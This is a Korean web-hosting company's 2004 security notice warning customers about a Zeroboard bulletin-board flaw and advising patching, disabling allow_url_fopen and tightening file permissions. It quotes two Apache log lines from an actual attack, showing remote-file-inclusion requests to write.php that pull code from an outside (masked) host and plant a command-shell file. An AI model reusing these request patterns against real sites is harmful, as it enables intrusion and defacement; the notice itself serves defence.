공지사항

공지사항
NAYANA의 소식과 안내 사항을 확인하세요.
공지사항 테이블
알림

[긴급공지] 제로보드 패치를 하여 웹 해킹을 방지 하세요.

2004-12-28 11:41:33
최근 제로보드의 취약점을 이용하여 특정 파일변경, 수정, 보기, 삭제 등이 가능하여 이를 통한 사고가 발생하고 있습니다.
특히 계정 내 폴더, 파일 권한이 nobody, 777, 707 인 경우 발생 합니다.

아래 내용은 해킹 사례로 제로보드를 통해index.htm을 변조하는 과정이 아파치 로그에 남은 기록입니다.

www.xxxxxxxxx.com 212.138.47.26 - - [27/Dec/2004:03:33:25 +0900] "GET /xxxx/bbs/include/write.php?dir=http://xxx.xxxx.xxx/safe20.dat?&chdir=/free/home/xxxx/html/xxxxx/bbs/include/... HTTP/1.0" 200 171327 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

www.xxxxxxxxx.com 212.138.47.20 - - [27/Dec/2004:03:33:50 +0900] "GET /xxxx/bbs/include/write.php?dir=http://xxx.xxxx.xxx /filed.dat?&inclvar=dir&o=/free/home/xxxx/html/xxxx/bbs/write_cmd.php HTTP/1.0" 200 5907 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

해킹을 방지 하기 위해 서버 관리자는 php.ini 파일에 allow_url_fopen = Off 으로 변경 해야 하며, 계정 내 폴더나 파일 권한은 꼭 필요한 경우 외에는 755이하로 설정을 해야 합니다.

또한 제로보드(http://www.nzeo.com/?channel=zeroboard) 공식 사이트를 통하여 최근 버전으로 반드시 패치 하셔야 합니다.

감사합니다.